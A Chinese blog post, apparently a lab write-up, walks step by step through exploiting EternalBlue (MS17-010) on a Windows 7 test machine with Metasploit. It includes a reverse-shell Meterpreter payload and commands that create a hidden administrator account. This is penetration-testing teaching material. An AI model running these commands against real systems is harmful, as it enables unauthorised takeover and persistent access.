永恒之蓝ms17_010漏洞复现

最新推荐文章于 2022-10-16 19:58:52 发布
最新推荐文章于 2022-10-16 19:58:52 发布
阅读量232 收藏 1
点赞数
分类专栏: Web安全-漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/113991966
版权
本文详细介绍了如何利用永恒之蓝漏洞对Windows系统进行渗透测试。实验步骤包括了从测试主机连通性、开启数据库、扫描目标主机、发现漏洞到利用ms17_010模块进行攻击,并最终获取远程主机的控制权。此外,还展示了如何创建管理员用户以获取更高权限。
摘要由CSDN通过智能技术生成

永恒之蓝


永恒之蓝是一种利用windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。

什么是SMB协议?

SMB(全称是Server Message
Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

实验环境

攻击机(kali):192.168.109.131

靶机 (win7):192.168.109.128

实验步骤

1.测试两台主机之间的连通性:用kali去ping windows7在这里插入图片描述

2.开启kali主机数据库:service postgresql

初始化msf数据库:msfdb init

开启msf:msfconsole
在这里插入图片描述

3.查看数据库连接状态:db_ststus

在这里插入图片描述

4.搜索ms17_010:search ms17_010
在这里插入图片描述

5.使用辅助模块的扫描命令:use auxiliary/scanner/smb/smb_ms17_010

6.查看模块所需设置的内容:options

在这里插入图片描述
RHOSTS :目标主机地址
RPORT :目标主机开放的端口,为445端口
THRENADS:线程,默认为1

7.扫描目标主机是否开放445端口:
在这里插入图片描述
8.设置目标主机地址:set rhosts 192.168.109.128
在这里插入图片描述
发现漏洞,很大可能可以利用.

9.进入攻击模块:use exploit/windows/smb/ms17_010_eternalblue

设置目标主机地址:set rhosts 192.168.109.128

10.设置payload: set payload windows/x64/meterpreter/reverse_tcp

最后在设置一下攻击机的地址:set lhost 192.168.109.131
在这里插入图片描述
攻击:exploit

在这里插入图片描述
攻击成功!

持续攻击

1.显示远程主机系统信息:sysinfo

在这里插入图片描述

2.查看用户身份:getuid

在这里插入图片描述

3.对远程主机当前屏幕进行截图:screenshot
截屏后,图片会显示在kali桌面

4.获取shell控制台:shell
在这里插入图片描述
5.创建管理员用户:net user stray 123456 /add
将stray加入到win7的本地管理员组中,获取更大权限:
net localgroup administrators stray /add
查看本机用户:net user
在这里插入图片描述
stray已经被添加到win7中!!!

永恒之蓝 ms17_010漏洞
qq_64501184的博客
11-28 1068
漏洞复现
MS17-010 漏洞利用
weixin_45095113的博客
12-13 1411
MS17-010 漏洞利用
kail利用msf工具对ms17-010永恒之蓝漏洞入侵渗透Win7
qq_50854662的博客
05-16 4604
kail利用msf工具对ms17-010永恒之蓝漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感
利用永恒之蓝漏洞+修复方法(MS17-010
小卜的博客
10-16 2181
在 kali 上利用MS17--010永恒之蓝漏洞实现控制目标主机,屏幕捕获
永恒之蓝漏洞复现
Myu_wzy的博客
12-05 2653
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获系统最高权限以此控制入侵计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
【网络安全】MS17-010永恒之蓝漏洞的利用
qq_45748133的博客
01-06 1万+
导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝漏洞的简单利用。 一、实验原理 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 二、实验环境 三、实验记录 一次渗透的基本步骤 (1)启动kali虚机,进入root权限打开Metasploit渗透工具。 msfco
永恒之蓝ms17_010漏洞复现实验
最新发布
01-03
很抱歉,根据提供的引用内容,我无法提供关于永恒之蓝MS17-010漏洞复现实验。这是因为复现漏洞需要特定的环境和设备,并且涉及到非法活动。我强烈建议您不要尝试复现漏洞,以免违法和造成不必要的损失。 如果...
永恒之蓝 MS17-010漏洞复现超级详细(虽然最后一步复现失败)
qq_44768719的博客
11-08 6875
一:漏洞原理 1:简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。 二、漏洞复现 准备: 一台关掉了防火墙的的win7(IP地址为192.168.1.101) 一台kalI 开始操作: 信息收集: 用nmap去扫描目标机的端口开启情况: nmap -sS -sV 192.168.1.101 这时候在发现445端口开启,这正是永恒之蓝利用的必备条件,且版本为win7-10 这时候我们可以利用msf去加载exp去利用 2.打开m
MS17-010永恒之蓝漏洞分析与复现
热门推荐
未完成的歌~的博客
03-12 6万+
文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块,对靶机进行攻击5、得到靶机shell6、通过shell对靶机进行控制 一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露
kali入门到入狱之 永恒之蓝MS17-010复现.
网络安全领域___专研者.
03-15 3622
利用永恒之蓝MS17-010)拿到电脑win7(32位)权限(包含:开关键盘/鼠标,文件上传,开启的远程桌面,使用摄像头拍照,重新启动计算机,关闭防护软件,消户登录,电脑蓝屏等等......)
网络攻防——永恒之蓝
weixin_46560512的博客
03-09 2万+
主要介绍永恒之蓝程序,即 windows7的SMB协议漏洞以及相关的攻击方式。
永恒之蓝(EternalBlue)漏洞利用实例
桂华流瓦的别致小院
05-15 1万+
1、升级kali-rolling a、修改更新源 vim /etc/apt/sources.list,只保留官方更新源“deb http://http.kali.org/kali kali-rolling main non-free contrib”将其他更新源注释掉; b、更新 apt-get update && apt-get upgrade 2、安装wine32 root@kali:
SMB MS17-010 利用(CVE-2017-0144 永恒之蓝
子曰小玖的博客
04-20 3270
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获系统最高权限以此控制入侵计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
漏洞复现(一):永恒之蓝ms17-010
weixin_47306547的博客
11-02 6782
目录 永恒之蓝简介 SMB协议 SMB原理 漏洞原理 漏洞危害 漏洞复现 实验环境 完整过程 扫描目标主机是否存在该漏洞 实施攻击 漏洞利用 漏洞防御 永恒之蓝简介 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获系统最高权限以此控制入侵计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、...
经典利用永恒之蓝漏洞对Windows操作系统进行攻击
qq_46202048的博客
11-25 1万+
利用永恒之蓝对Windows进行攻击 环境搭建:kali、Windows server 2008R2、Windows 7,其中Windows server 2008R2\WIN7为靶机。 首先简单介绍一下什么是永恒之蓝永恒之蓝【Eternal Blue】爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获系统最高权限以此控制入侵计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到
永恒之蓝ms17-010漏洞利用(提meterpreter权限shell,进入windows 远程操控主机)
qq_42527761的博客
07-19 1万+
最近在学习The-Hacker-Playbook-3这本书,书中介绍的红队的第一个核心工具:Metasploit 框架,尽管 Metasploit 框架从 2003 年开发的,但它现在仍然是一个非常棒的工具。有最初的开发者 H.D. Moore 和非常活跃的社区为它提供持续支持。这个社区的驱动的框架,拥有着所有最新的公开漏洞的利用、后渗透利用模块、辅助模块等等。对于红队项目,我们可以使用 Metasploit 通过MS17-010永恒之蓝漏洞危害内部系统,以获得我们的第一个内网 shell,或者
MS17-010(永恒之蓝)—漏洞复现及防范》
weixin_47118413的博客
04-10 1万+
通过Kali使用msfconsole在Win7复现MS17-010(永恒之蓝)漏洞以及如何防范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值